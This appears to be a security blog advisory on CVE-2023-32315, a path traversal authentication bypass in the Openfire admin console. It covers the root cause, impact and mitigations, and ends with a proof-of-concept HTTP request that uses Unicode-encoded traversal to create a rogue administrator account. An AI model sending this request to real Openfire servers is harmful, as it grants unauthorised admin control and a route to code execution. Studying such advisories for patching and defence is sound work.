Openfire Admin Console Auth Bypass – CVE-2023-32315

Posted on

Vulnerable Version

version 4.7.4 and 4.6.7

Fixed Version

version 4.7.5, 4.6.8

Base Score

7.5 High                                                                        

Vendor Description:-

Openfire is an open-source XMPP (Jabber) server used for real-time messaging and collaboration. It is written in Java and provides features like user authentication, group chat, and plugin support. Openfire is widely used for internal corporate chat systems and integrates with LDAP, databases, and third-party tools. It has a web-based Admin Console for easy configuration and management. Due to its open nature, Openfire is commonly deployed in self-hosted environments for secure messaging.

CVE-2023-32315 Vulnerability Description

A path traversal vulnerability, CVE-2008-6508, was discovered in the Openfire admin console over a decade ago. Attackers can utilize the /setup/setup-/../../[page].jsp to avoid authentication checks and navigate to any page without knowing the admin username and password.

Since then, path traversal protections have been in place to defend against exactly this type of attack.

A later version of the embedded webserver added support for non-standard URL encoding of UTF-16 characters. The path traversal protections in Openfire have not been updated to protect against this new encoding. As a result, attackers can once again defeat the path traversal protection by using /setup/setup-/%u002e%u002e/%u002e%u002e/[page].jsp.

Root Cause

The vulnerability occurs because:

  1. Incomplete Path Traversal Protections: Openfire’s setup endpoint implements protections against traditional path traversal sequences (e.g., ../), but these protections do not account for Unicode-encoded representations of the same sequences.
  2. Improper Input Sanitization: The server does not properly decode and sanitize Unicode-encoded input before processing it, allowing attackers to bypass restrictions.

Impact of CVE-2023-32315

  • Attackers can steal user data, chat logs, credentials, and other stored information.
  • Attackers can directly access Openfire’s Admin Console without authentication.
  • Since admin access allows plugin management, an attacker can upload malicious plugins or manipulate settings to execute arbitrary code.
  • Attackers can steal user data, chat logs, credentials, and other stored information.

Mitigation

  1. Patch: Upgrade to Openfire version 4.7.5, 4.6.8, or later, where this vulnerability has been fixed.
  2. Input Sanitization: Decode and sanitize all input, including Unicode-encoded sequences, before applying path traversal checks.
  3. Access Control: Restrict access to the /setup/ pages to trusted IP addresses or networks.
  4. File Permissions: Ensure sensitive files are stored outside the web root or have restricted permissions.

POC

To exploit this issue, the first step is to create a new administrator through following request:

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
Host: localhost:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken
image 6

Then log in to the admin console with this account, and you can see that user is already an administrator.

image 9

Leave a Reply

Your email address will not be published. Required fields are marked *